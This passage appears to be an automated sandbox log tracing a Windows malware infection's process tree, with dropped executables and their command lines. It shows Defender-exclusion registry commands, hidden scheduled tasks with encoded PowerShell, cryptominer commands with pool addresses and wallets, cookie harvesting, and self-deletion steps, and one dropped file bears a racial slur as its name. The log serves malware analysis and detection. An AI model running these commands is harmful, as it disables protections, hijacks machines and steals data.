        
        "C:\Users\Admin\AppData\Roaming\AF25.tmp.exe"
        10⤵
        
        PID:4740
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\AF25.tmp.exe"
        11⤵
        
        PID:7244
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        12⤵
        Delays execution with timeout.exe
        
        PID:2596
        
        C:\Users\Admin\AppData\Local\Temp\8e3d16c0..exe
        
        "C:\Users\Admin\AppData\Local\Temp\8e3d16c0..exe"
        10⤵
        
        PID:8840
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        11⤵
        
        PID:9004
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        11⤵
        
        PID:8512
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        10⤵
        
        PID:192
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        11⤵
        Runs ping.exe
        
        PID:7404
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"
        9⤵
        
        PID:8804
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ozm3a11s.xf5\setup.exe /S /kr /site_id=754 & exit
        7⤵
        
        PID:8680
        
        C:\Users\Admin\AppData\Local\Temp\ozm3a11s.xf5\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\ozm3a11s.xf5\setup.exe /S /kr /site_id=754
        8⤵
        
        PID:4680
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        9⤵
        
        PID:8516
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        10⤵
        
        PID:6208
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        11⤵
        
        PID:6712
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        11⤵
        
        PID:7884
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gqzICNsOT" /SC once /ST 07:14:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        9⤵
        Creates scheduled task(s)
        
        PID:8964
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gqzICNsOT"
        9⤵
        
        PID:8520
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gqzICNsOT"
        9⤵
        
        PID:5648
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bmIXAqnwlcZKDlfrrr" /SC once /ST 19:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\YuVqfQI.exe\" 9n /site_id 754 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:5540
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5a40z5f0.yw0\Four.exe & exit
        7⤵
        
        PID:7452
        
        C:\Users\Admin\AppData\Local\Temp\5a40z5f0.yw0\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\5a40z5f0.yw0\Four.exe
        8⤵
        
        PID:5140
        
        C:\Users\Admin\AppData\Local\Temp\BQDXOE4BQL\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BQDXOE4BQL\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        9⤵
        
        PID:6700
        
        C:\Users\Admin\AppData\Local\Temp\BQDXOE4BQL\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BQDXOE4BQL\multitimer.exe" 1 3.1616696690.605cd57242746 104
        10⤵
        
        PID:4236
        
        C:\Users\Admin\AppData\Local\Temp\BQDXOE4BQL\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BQDXOE4BQL\multitimer.exe" 2 3.1616696690.605cd57242746
        11⤵
        
        PID:7192
        
        C:\Users\Admin\AppData\Local\Temp\85P8176DHT\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\85P8176DHT\setups.exe" ll
        9⤵
        
        PID:8348
        
        C:\Users\Admin\AppData\Local\Temp\is-TB2LA.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-TB2LA.tmp\setups.tmp" /SL5="$30540,383902,148480,C:\Users\Admin\AppData\Local\Temp\85P8176DHT\setups.exe" ll
        10⤵
        
        PID:8180
      - C:\Users\Admin\AppData\Local\Temp\5d-e1e90-626-e95bf-d87bfaa74c611\ZHuvowydore.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5d-e1e90-626-e95bf-d87bfaa74c611\ZHuvowydore.exe"
        6⤵
        
        PID:584
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 2012
        7⤵
        
        PID:8936
- - C:\Program Files (x86)\Versium Research\Versium Research\vlcplayer.exe
    "C:\Program Files (x86)\Versium Research\Versium Research\vlcplayer.exe"
    3⤵
    PID:5488
  - - C:\Users\Admin\AppData\Local\Temp\Services.exe
      "C:\Users\Admin\AppData\Local\Temp\Services.exe"
      4⤵
      Drops file in Windows directory
      Suspicious use of WriteProcessMemory
      PID:1204
    - - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=7 --unam-idle-cpu=70 --tls --unam-stealth
        5⤵
        
        PID:3640
- - C:\Program Files (x86)\Versium Research\Versium Research\Z7pGMA6DzfieVAOXDEtkk7kL.exe
    "C:\Program Files (x86)\Versium Research\Versium Research\Z7pGMA6DzfieVAOXDEtkk7kL.exe"
    3⤵
    PID:5784
  - - C:\Users\Admin\Documents\v40AOcEtbC0nuC3Miv6WyWrY.exe
      "C:\Users\Admin\Documents\v40AOcEtbC0nuC3Miv6WyWrY.exe"
      4⤵
      PID:188
    - - C:\Users\Admin\Documents\WdRLUXcwDGeHGDurRprwzVoO.exe
        
        "C:\Users\Admin\Documents\WdRLUXcwDGeHGDurRprwzVoO.exe"
        5⤵
        
        PID:212
      - C:\Users\Admin\Documents\WdRLUXcwDGeHGDurRprwzVoO.exe
        
        "C:\Users\Admin\Documents\WdRLUXcwDGeHGDurRprwzVoO.exe"
        6⤵
        
        PID:5260
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5260 -s 104
        7⤵
        Program crash
        
        PID:5624
      - C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe
        
        "C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe"
        6⤵
        
        PID:5740
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{yOal-PYgqV-zkZh-TfkHZ}\70743711946.exe"
        7⤵
        
        PID:8740
        
        C:\Users\Admin\AppData\Local\Temp\{yOal-PYgqV-zkZh-TfkHZ}\70743711946.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{yOal-PYgqV-zkZh-TfkHZ}\70743711946.exe"
        8⤵
        
        PID:9064
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im 70743711946.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{yOal-PYgqV-zkZh-TfkHZ}\70743711946.exe" & del C:\ProgramData\*.dll & exit
        9⤵
        
        PID:7140
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im 70743711946.exe /f
        10⤵
        Kills process with taskkill
        
        PID:5184
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        10⤵
        Delays execution with timeout.exe
        
        PID:2280
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{yOal-PYgqV-zkZh-TfkHZ}\52707845882.exe" /mix
        7⤵
        
        PID:6428
        
        C:\Users\Admin\AppData\Local\Temp\{yOal-PYgqV-zkZh-TfkHZ}\52707845882.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{yOal-PYgqV-zkZh-TfkHZ}\52707845882.exe" /mix
        8⤵
        
        PID:4448
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\GmCcIriNWyuJ & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{yOal-PYgqV-zkZh-TfkHZ}\52707845882.exe"
        9⤵
        
        PID:7772
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        10⤵
        Delays execution with timeout.exe
        
        PID:4716
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "nigger.exe" /f & erase "C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe" & exit
        7⤵
        
        PID:8236
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "nigger.exe" /f
        8⤵
        Kills process with taskkill
        
        PID:8136
    - - C:\Users\Admin\Documents\BnC4S5WBzvEP3YhdXpB1HqQi.exe
        
        "C:\Users\Admin\Documents\BnC4S5WBzvEP3YhdXpB1HqQi.exe"
        5⤵
        
        PID:6692
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{YKLX-NiS9t-pjio-DTmhO}\71450671182.exe"
        6⤵
        
        PID:5692
        
        C:\Users\Admin\AppData\Local\Temp\{YKLX-NiS9t-pjio-DTmhO}\71450671182.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{YKLX-NiS9t-pjio-DTmhO}\71450671182.exe"
        7⤵
        
        PID:6768
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im 71450671182.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{YKLX-NiS9t-pjio-DTmhO}\71450671182.exe" & del C:\ProgramData\*.dll & exit
        8⤵
        
        PID:7800
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im 71450671182.exe /f
        9⤵
        Kills process with taskkill
        
        PID:7064
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        9⤵
        Delays execution with timeout.exe
        
        PID:8960
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{YKLX-NiS9t-pjio-DTmhO}\99990249254.exe" /mix
        6⤵
        
        PID:6116
        
        C:\Users\Admin\AppData\Local\Temp\{YKLX-NiS9t-pjio-DTmhO}\99990249254.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{YKLX-NiS9t-pjio-DTmhO}\99990249254.exe" /mix
        7⤵
        
        PID:5464
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "BnC4S5WBzvEP3YhdXpB1HqQi.exe" /f & erase "C:\Users\Admin\Documents\BnC4S5WBzvEP3YhdXpB1HqQi.exe" & exit
        6⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "BnC4S5WBzvEP3YhdXpB1HqQi.exe" /f
        7⤵
        Kills process with taskkill
        
        PID:4512
    - - C:\Users\Admin\Documents\zDHTXtxwVHGI7fTDn43uf1UH.exe
        
        "C:\Users\Admin\Documents\zDHTXtxwVHGI7fTDn43uf1UH.exe"
        5⤵
        
        PID:5776
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5776 -s 1456
        6⤵
        Program crash
        
        PID:5488
    - - C:\Users\Admin\Documents\slPBloyhH8SnW1BZqVDFLgg9.exe
        
        "C:\Users\Admin\Documents\slPBloyhH8SnW1BZqVDFLgg9.exe"
        5⤵
        
        PID:5060
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 1140
        6⤵
        Program crash
        
        PID:6464
    - - C:\Users\Admin\Documents\EQcGwb4giwt7eskp0SkW10Ls.exe
        
        "C:\Users\Admin\Documents\EQcGwb4giwt7eskp0SkW10Ls.exe"
        5⤵
        
        PID:5580
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{k5H6-ZVwO3-jtyd-fC7eu}\38500256963.exe"
        6⤵
        
        PID:7080
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{k5H6-ZVwO3-jtyd-fC7eu}\38787054982.exe" /mix
        6⤵
        
        PID:2268
        
        C:\Users\Admin\AppData\Local\Temp\{k5H6-ZVwO3-jtyd-fC7eu}\38787054982.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{k5H6-ZVwO3-jtyd-fC7eu}\38787054982.exe" /mix
        7⤵
        
        PID:4112
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\leYPgoQg & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{k5H6-ZVwO3-jtyd-fC7eu}\38787054982.exe"
        8⤵
        
        PID:9108
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        9⤵
        Delays execution with timeout.exe
        
        PID:5220
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "EQcGwb4giwt7eskp0SkW10Ls.exe" /f & erase "C:\Users\Admin\Documents\EQcGwb4giwt7eskp0SkW10Ls.exe" & exit
        6⤵
        
        PID:7384
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "EQcGwb4giwt7eskp0SkW10Ls.exe" /f
        7⤵
        Kills process with taskkill
        
        PID:7716
    - - C:\Users\Admin\Documents\tAxUGLpIaDq2F876etcbZhSL.exe
        
        "C:\Users\Admin\Documents\tAxUGLpIaDq2F876etcbZhSL.exe"
        5⤵
        
        PID:1492
      - C:\Users\Admin\Documents\tAxUGLpIaDq2F876etcbZhSL.exe
        
        "C:\Users\Admin\Documents\tAxUGLpIaDq2F876etcbZhSL.exe"
        6⤵
        
        PID:7052
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{FVRh-tZmDA-tbXc-jvs0k}\59500975096.exe"
        7⤵
        
        PID:7860
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{FVRh-tZmDA-tbXc-jvs0k}\84350524316.exe" /mix
        7⤵
        
        PID:7696
        
        C:\Users\Admin\AppData\Local\Temp\{FVRh-tZmDA-tbXc-jvs0k}\84350524316.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{FVRh-tZmDA-tbXc-jvs0k}\84350524316.exe" /mix
        8⤵
        
        PID:8508
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\PiTevwVLDjQkS & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{FVRh-tZmDA-tbXc-jvs0k}\84350524316.exe"
        9⤵
        
        PID:7400
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        10⤵
        Delays execution with timeout.exe
        
        PID:6032
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "tAxUGLpIaDq2F876etcbZhSL.exe" /f & erase "C:\Users\Admin\Documents\tAxUGLpIaDq2F876etcbZhSL.exe" & exit
        7⤵
        
        PID:7640
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "tAxUGLpIaDq2F876etcbZhSL.exe" /f
        8⤵
        Kills process with taskkill
        
        PID:8448
      - C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe
        
        "C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe"
        6⤵
        
        PID:6236
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{A7eg-zZNrM-2FTm-5Ao1P}\62284621035.exe"
        7⤵
        
        PID:8560
        
        C:\Users\Admin\AppData\Local\Temp\{A7eg-zZNrM-2FTm-5Ao1P}\62284621035.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{A7eg-zZNrM-2FTm-5Ao1P}\62284621035.exe"
        8⤵
        
        PID:6444
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im 62284621035.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{A7eg-zZNrM-2FTm-5Ao1P}\62284621035.exe" & del C:\ProgramData\*.dll & exit
        9⤵
        
        PID:9012
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im 62284621035.exe /f
        10⤵
        Kills process with taskkill
        
        PID:8648
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        10⤵
        Delays execution with timeout.exe
        
        PID:3588
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{A7eg-zZNrM-2FTm-5Ao1P}\35272917022.exe" /mix
        7⤵
        
        PID:6948
        
        C:\Users\Admin\AppData\Local\Temp\{A7eg-zZNrM-2FTm-5Ao1P}\35272917022.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{A7eg-zZNrM-2FTm-5Ao1P}\35272917022.exe" /mix
        8⤵
        
        PID:8116
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\lQDuYIKgG & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{A7eg-zZNrM-2FTm-5Ao1P}\35272917022.exe"
        9⤵
        
        PID:7784
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        10⤵
        Delays execution with timeout.exe
        
        PID:7840
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "nigger.exe" /f & erase "C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe" & exit
        7⤵
        
        PID:1284
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "nigger.exe" /f
        8⤵
        Kills process with taskkill
        
        PID:8156
- - C:\Program Files (x86)\Versium Research\Versium Research\RmSetp.exe
    "C:\Program Files (x86)\Versium Research\Versium Research\RmSetp.exe"
    3⤵
    PID:4440
  - - C:\ProgramData\3590180.exe
      "C:\ProgramData\3590180.exe"
      4⤵
      PID:6128
  - - C:\ProgramData\8072829.exe
      "C:\ProgramData\8072829.exe"
      4⤵
      PID:4776
    - - C:\ProgramData\Windows Host\Windows Host.exe
        
        "C:\ProgramData\Windows Host\Windows Host.exe"
        5⤵
        
        PID:6968
  - - C:\ProgramData\1775795.exe
      "C:\ProgramData\1775795.exe"
      4⤵
      PID:5288
  - - C:\ProgramData\3472783.exe
      "C:\ProgramData\3472783.exe"
      4⤵
      PID:4992
- - C:\Program Files (x86)\Versium Research\Versium Research\YiXjaRalM3qf.exe
    "C:\Program Files (x86)\Versium Research\Versium Research\YiXjaRalM3qf.exe"
    3⤵
    PID:4492
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      4⤵
      PID:6292
- - C:\Program Files (x86)\Versium Research\Versium Research\lylal220.exe
    "C:\Program Files (x86)\Versium Research\Versium Research\lylal220.exe"
    3⤵
    PID:4268
  - - C:\Users\Admin\AppData\Local\Temp\is-13GO3.tmp\lylal220.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-13GO3.tmp\lylal220.tmp" /SL5="$204E4,491750,408064,C:\Program Files (x86)\Versium Research\Versium Research\lylal220.exe"
      4⤵
      PID:4128
    - - C:\Users\Admin\AppData\Local\Temp\is-P9C6G.tmp\Microsoft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-P9C6G.tmp\Microsoft.exe" /S /UID=lylal220
        5⤵
        
        PID:5880
      - C:\Program Files\Internet Explorer\XLSECGYCMV\irecord.exe
        
        "C:\Program Files\Internet Explorer\XLSECGYCMV\irecord.exe" /VERYSILENT
        6⤵
        
        PID:4540
        
        C:\Users\Admin\AppData\Local\Temp\is-1PSFT.tmp\irecord.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1PSFT.tmp\irecord.tmp" /SL5="$40274,6265333,408064,C:\Program Files\Internet Explorer\XLSECGYCMV\irecord.exe" /VERYSILENT
        7⤵
        
        PID:5332
      - C:\Users\Admin\AppData\Local\Temp\bc-62e7b-80d-7b294-d96368b0177a0\Qykusatanae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bc-62e7b-80d-7b294-d96368b0177a0\Qykusatanae.exe"
        6⤵
        
        PID:7036
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 2164
        7⤵
        
        PID:5968
      - C:\Users\Admin\AppData\Local\Temp\fc-914a4-ca4-07685-180de3b53616f\Suxoguduco.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fc-914a4-ca4-07685-180de3b53616f\Suxoguduco.exe"
        6⤵
        
        PID:4744
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3jsz1kxn.bev\gaooo.exe & exit
        7⤵
        
        PID:7344
        
        C:\Users\Admin\AppData\Local\Temp\3jsz1kxn.bev\gaooo.exe
        
        C:\Users\Admin\AppData\Local\Temp\3jsz1kxn.bev\gaooo.exe
        8⤵
        
        PID:7852
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        9⤵
        
        PID:7480
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        9⤵
        
        PID:7224
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xqcw1mui.khn\md7_7dfj.exe & exit
        7⤵
        
        PID:8992
        
        C:\Users\Admin\AppData\Local\Temp\xqcw1mui.khn\md7_7dfj.exe
        
        C:\Users\Admin\AppData\Local\Temp\xqcw1mui.khn\md7_7dfj.exe
        8⤵
        
        PID:8744
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\53peziu3.en2\customer6.exe & exit
        7⤵
        
        PID:8832
        
        C:\Users\Admin\AppData\Local\Temp\53peziu3.en2\customer6.exe
        
        C:\Users\Admin\AppData\Local\Temp\53peziu3.en2\customer6.exe
        8⤵
        
        PID:7588
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"
        9⤵
        
        PID:5780
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ie3fskxn.jye\askinstall31.exe & exit
        7⤵
        
        PID:7820
        
        C:\Users\Admin\AppData\Local\Temp\ie3fskxn.jye\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\ie3fskxn.jye\askinstall31.exe
        8⤵
        
        PID:5752
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j2sdyikz.fbe\HookSetp.exe & exit
        7⤵
        
        PID:7676
        
        C:\Users\Admin\AppData\Local\Temp\j2sdyikz.fbe\HookSetp.exe
        
        C:\Users\Admin\AppData\Local\Temp\j2sdyikz.fbe\HookSetp.exe
        8⤵
        
        PID:8660
        
        C:\ProgramData\2724113.exe
        
        "C:\ProgramData\2724113.exe"
        9⤵
        
        PID:8140
        
        C:\ProgramData\4166176.exe
        
        "C:\ProgramData\4166176.exe"
        9⤵
        
        PID:1756
        
        C:\ProgramData\4234941.exe
        
        "C:\ProgramData\4234941.exe"
        9⤵
        
        PID:1724
        
        C:\ProgramData\1576742.exe
        
        "C:\ProgramData\1576742.exe"
        9⤵
        
        PID:6400
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fqgt4s2z.j5t\GcleanerWW.exe /mixone & exit
        7⤵
        
        PID:8460
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vuffitwh.za5\19.exe & exit
        7⤵
        
        PID:8224
        
        C:\Users\Admin\AppData\Local\Temp\vuffitwh.za5\19.exe
        
        C:\Users\Admin\AppData\Local\Temp\vuffitwh.za5\19.exe
        8⤵
        
        PID:3136
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\javc\install.dll",install
        9⤵
        
        PID:8652
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lpj5kljt.t5b\b9706c20.exe & exit
        7⤵
        
        PID:7952
        
        C:\Users\Admin\AppData\Local\Temp\lpj5kljt.t5b\b9706c20.exe
        
        C:\Users\Admin\AppData\Local\Temp\lpj5kljt.t5b\b9706c20.exe
        8⤵
        
        PID:9060
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0tzaod0u.3da\setup.exe /8-2222 & exit
        7⤵
        
        PID:6640
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a0slvfyk.cgs\file.exe & exit
        7⤵
        
        PID:7612
        
        C:\Users\Admin\AppData\Local\Temp\a0slvfyk.cgs\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\a0slvfyk.cgs\file.exe
        8⤵
        
        PID:8312
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
        9⤵
        
        PID:1916
        
        C:\Users\Admin\AppData\Local\Temp\OTV5FP851V\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OTV5FP851V\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        10⤵
        
        PID:2156
        
        C:\Users\Admin\AppData\Local\Temp\OTV5FP851V\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OTV5FP851V\multitimer.exe" 1 3.1616696688.605cd570571d4 101
        11⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\OTV5FP851V\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OTV5FP851V\multitimer.exe" 2 3.1616696688.605cd570571d4
        12⤵
        
        PID:8820
        
        C:\Users\Admin\AppData\Local\Temp\sceu0aipidr\vict.exe
        
